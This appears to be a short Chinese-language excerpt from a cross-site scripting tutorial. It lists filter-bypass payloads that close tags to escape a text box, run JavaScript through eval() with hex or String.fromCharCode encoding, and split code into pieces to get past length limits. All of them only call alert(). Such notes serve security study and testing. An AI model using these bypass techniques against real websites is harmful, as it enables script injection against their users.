"; 代码被放在了文本框内
那我们就可通过闭合标签绕过 alert("xx")
利用HTML标签执行...>eval("alert('xaaa')") 通过eval()函数执行js
eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x78\x78...\x78\x27\x29") 16进制转码后通过eval函数执行
javascript:eval(String.fromCharCode(97,108,101,114,116,40,39,120,120,122,122,39,41...))"> eval()配合String.fromCharCode()函数执行10进制脚本
代码拆分执行:
z='javascript:'...z=z+'alert(/xxss/)'
eval(z) 可绕过字符长度限制
---------------------